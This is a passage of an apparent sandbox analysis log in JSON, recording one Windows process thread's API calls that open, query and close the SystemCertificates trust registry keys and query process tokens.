21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000560" + } + ], + "repeated": 0, + "id": 1877 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000560" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000055c" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\trust\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1878 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000560" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1879 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000560" + } + ], + "repeated": 0, + "id": 1880 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000560" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000055c" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\trust\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1881 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000560" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1882 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000560" + } + ], + "repeated": 0, + "id": 1883 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fb900", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1884 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000560" + } + ], + "repeated": 0, + "id": 1885 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1886 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e8775", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1887 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e878d", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1888 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1889 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "(\\xee[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00;>\\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v*\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00D\\xee[\\x05P\\xef[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f's\\xc0\\xee[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f's\\x10\\xef[\\x05\\xf3>\\xd6\\xfa\\xf4\\xe9[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xff\\x0c\\xef[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%sL\\xef[\\x05\\xb4\\xf1l\\xef\\x0c\\xef\\xfc\\xeep\\xef\\x00\\x00<\\xff\\x00\\x00\\xb4\\xf1[\\x05l\\xef[\\x05p\\xef[\\x05\\x00\\x00\\x00\\x00 \\xef[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00L\\xef[\\x05" + } + ], + "repeated": 0, + "id": 1890 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x7680880c", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1891 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1892 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 1893 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000560" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\" + } + ], + "repeated": 0, + "id": 1894 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e86a7", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1895 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000560" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\trust" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\trust" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1896 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000564" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\trust\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1897 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000564" + }, + { + "name": "KeyInformation", + "value": "\\xff91\\xffe05\\x04\\x11~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1898 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000564" + } + ], + "repeated": 0, + "id": 1899 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000564" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\trust\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1900 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000564" + }, + { + "name": "KeyInformation", + "value": "\\xff91\\xffe05\\x04\\x11~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1901 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000564" + } + ], + "repeated": 0, + "id": 1902 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000564" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\trust\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1903 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000564" + }, + { + "name": "KeyInformation", + "value": "\\xff91\\xffe05\\x04\\x11~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1904 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000564" + } + ], + "repeated": 0, + "id": 1905 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e8258", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1906 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1907 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\trust\\PhysicalStores" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\trust\\PhysicalStores" + } + ], + "repeated": 0, + "id": 1908 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1909 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\trust" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\trust" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1910 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fa617", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000538" + } + ], + "repeated": 0, + "id": 1911 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1912 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\trust" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\trust" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1913 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000538" + }, + { + "name": "ObjectAttributesName", + "value": "" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\trust\\" + } + ], + "repeated": 0, + "id": 1914 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000564" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\trust\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1915 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000564" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1916 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000564" + } + ], + "repeated": 0, + "id": 1917 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000564" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\trust\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1918 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000564" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1919 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000564" + } + ], + "repeated": 0, + "id": 1920 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000564" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\trust\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1921 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000564" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1922 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000564" + } + ], + "repeated": 0, + "id": 1923 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fb900", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000538" + } + ], + "repeated": 0, + "id": 1924 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], 